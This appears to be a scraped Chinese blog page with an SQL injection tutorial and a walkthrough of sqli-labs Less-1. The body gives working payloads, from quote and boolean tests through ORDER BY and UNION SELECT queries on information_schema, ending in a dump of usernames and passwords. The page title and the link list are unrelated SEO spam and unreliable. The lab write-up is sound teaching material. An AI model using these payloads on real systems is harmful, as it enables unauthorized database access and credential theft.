当前位置: 首页 > wzjs >正文

对外网站ipv6建设方案模板北京seo优化诊断

对外网站ipv6建设方案模板,北京seo优化诊断,电商网站改版思路,邯郸建设公司网站判断注入类型 (1)首先判断是否存在sql注入点 对id1的参数修改为id1,来判断是否存在sql注入点。因为通过加入,使后台的sql语句中单引号个数不匹配来导致sql语句报错。 如果不报错的话,也不一定是不存在sql注入点,也有可…

判断注入类型

(1)首先判断是否存在sql注入点
对id=1的参数修改为id=1',来判断是否存在sql注入点。因为通过加入',使后台的sql语句中单引号个数不匹配来导致sql语句报错。
如果不报错的话,也不一定是不存在sql注入点,也有可能是因为后端对'进行
了过滤。
(2)判断是什么注入类型
分为2种,为字符型注入和数字型注入。
1.使用id=1 and 1=1与id=1 and 1=2来判断数字型的注入。
如果后端是一个sql的查询语句,那么我们传入id参数后,后端的解析代码为:
select * from <表名> where id = x and 1=1,这里进行了与操作,因为1=1,所以最后的返回结果是正确的。
select * from <表名> where id = x and 1=2,这里也进行了与操作,但是最后1=2是错,所以与操作后,最后的结果是错,就会进行报错,从而验证是否为数字型注入。
再来看对于字符型注入来说:
select * from <表名> where id = 'x and 1=1',这里因为加上了单引号,所以对于后面的与操作就不再表示与操作,而是全部转换为字符串进行解析。
2.使用id=1' and '1'='1与id=1' and '1'='2来判断是否为字符型注入
一样的判断方法,如果后端是一个sql查询语句,我们传入前面对应的id参数后,后端的解析代码为:
select * from <表名> where id ='x' and '1'='1',这样我们传入的id参数是最后执行的sql语句语法正确,最后的判断结果为正从而正常执行返回正常结果。
select * from <表名> where id ='x' and '1'='2',这样判断后的结果为否,从而不能正常执行sql语句,最后爆出sql语法的错误。

下面通过sqli-labs靶场对sql注入漏洞进行练习。
#less-1
前面知道了大概的判断方法,我们先判断这关是sql注入的哪种类型。
输入id=1,
在这里插入图片描述
我们得到了一个正常的回显,下面我们输入id=1’,来判断是否存在sql注入的漏洞。
在这里插入图片描述
报了sql语法的错误,说明存在sql注入的漏洞,我们下面测试是什么类型的sql注入。
进行数字型的sql注入判断:
id=1 and 1=1
在这里插入图片描述
正常回显了。
再输入id =1 and 1=2
在这里插入图片描述
也是正常回显,要求我们输入带有数字值的id。
那下面尝试字符型的注入:
id=1’ and ‘1’ = '1

在这里插入图片描述
回显正常,那再试
id =1’ and ‘1’ = ‘2
在这里插入图片描述
没有回显了,确定是字符型的注入。
知道是字符型注入就继续判断字段数。
输入 id =1’ order by 3 --+
在这里插入图片描述
回显没有报错,再试着输入4来判断是否为4个字段数。
id=1’ order by 4–+
在这里插入图片描述
报错,所以字段数应该为3.
下面进行查看显示位:
id= -1’ union select 1,2,3–+
在这里插入图片描述
回显的字段为2,3。这里输入-1,是为了让后台查询中,因为sql中没有-1,所以执行联合查询的后面语句。
知道了回显位,我们进行爆数据库。
id=-1’ union select 1,database(),version() --+
在这里插入图片描述
回显出了对应的数据库名称与数据库版本。
然后对输出的security数据库进行报表。
id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’–+
在这里插入图片描述
回显了对应的数据库下的表。
我们可以对users表中的字段名进行查询。
id=-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’–+
在这里插入图片描述
然后输出对应的字段名的数据。
id=-1’ union select 1,2,group_concat(id,username,password) from users --+
在这里插入图片描述
输出了对应的信息。

对源代码的分析

找到了对应的源代码,进行分析
在这里插入图片描述
对图片中后台sql查询的代码分析,可以看到这个闭合的方式单引号闭合。并且没有做其他的过滤,造成了sql注入。

http://www.dtcms.com/wzjs/818264.html

相关文章:

  • 网站安全风险提示单做旅游网站毕设任务书
  • 网站导航广告怎么做做课件可赚钱的网站
  • 网站后期维护合同网站做的好的医院
  • 注册了域名之后怎么做网站点子创意网
  • 免流网站开发门户网站开发的背景和意义
  • 遵义专业网站建设公司电话个人博客怎么注册
  • 福州网站建设方案服务好的漂亮的淘宝客网站模板
  • 网站字体大小合适制作网站一年多少钱
  • 初中生如何做网站公司网站设计与管理
  • wordpress怎么设置用户登陆江门seo推广优化
  • 国外网站seo企业网站 优帮云
  • 竞价网站和优化网站的区别西安网站建设服务商
  • 怎样建设网站后台门户网站建设方案是什么意思
  • 如何做教育类网站最佳搜索引擎磁力吧
  • 龙华网站开发公司电话装修设计软件app排行榜前5名
  • 贵阳两学一做网站全球最大的电商平台
  • 西安做网站科技有限公司微信公众号可以做网站嘛
  • 怎么给网站做logo2016市网站建设总结
  • 团购网站建设报价市场营销方案案例范文
  • 宁波建站模板源码汽车行业网站建设比较好
  • 恒一信息深圳网站建设公司2中国电商排名前十名
  • 电商网站有哪些平台wordpress 翻译方案
  • 网上做宣传的网站阿里云 wordpress 区别
  • 阿里云网站方案建设书模板世界500强企业排名(2021最新名单)
  • 微网站建设报价方案模板crm客户关系系统
  • 深圳网站搜索引擎优化网站开发的相关语言有哪些
  • 代码网站怎么做的网站设计素材网站
  • 重庆网站seo什么意思如何建立电商平台
  • 做免费外贸网站公司做网站需要好多钱
  • 湖北网站建设怎样android编程